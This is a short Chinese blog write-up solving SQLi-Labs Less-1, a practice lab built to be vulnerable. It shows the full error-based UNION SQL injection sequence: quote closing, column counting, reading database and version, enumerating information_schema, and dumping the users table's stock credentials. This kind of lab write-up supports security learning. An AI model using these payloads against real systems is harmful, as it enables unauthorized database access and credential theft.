phpstudy-sqlilabs-less-1

题目:GET - Error based - Single quotes - String

基于错误的单引号GET型字符注入

尝试闭合'

?id=1 'and 1=2--+

有反应,报错了

闭合成功,可以注入

开始注入

?id=1 'order by 5--+

?id=1 'order by 4--+

?id=1 'order by 3--+

总共有三个字段

查看可显示字段

?id=-1 'union select 1,2,3--+

2,3可显示

搜索数据库名与版本

?id=-1 'union select 1,database(),version()--+

库名:security

版本:5.7.26

搜索表名

?id=-1 'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

表名:emails,referers,uagents,users

搜索列名

?id=-1 'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

列名:USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,level,id,username,password

搜索账密

?id=-1 'union select 1,username,password from users limit 0,1--+

账:Dumb

密:Dumb

?id=-1 'union select 1,username,password from users limit 1,1--+

账:Angelina

密:I-kill-you

?id=-1 'union select 1,username,password from users limit 2,1--+

账:Dummy

密:p@ssword

依次类推可找出全部账密

也可以用

?id=-1 'union select 1,group_concat(username),group_concat(password) from users--+

尝试搜索全部,但是很有收集不全。

posted @   我用歌声寻觅你  阅读(7)  评论(0编辑  收藏  举报
相关博文:
·  phpstudy-sqlilabs-less-2
·  phpstudy-sqlilabs-less-11
·  【Loading 16/75】Web_SQLi-Labs_WriteUp
·  Less-1
·  sqlilabs
阅读排行:
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】
点击右上角即可分享
微信分享提示
AI IDE Trae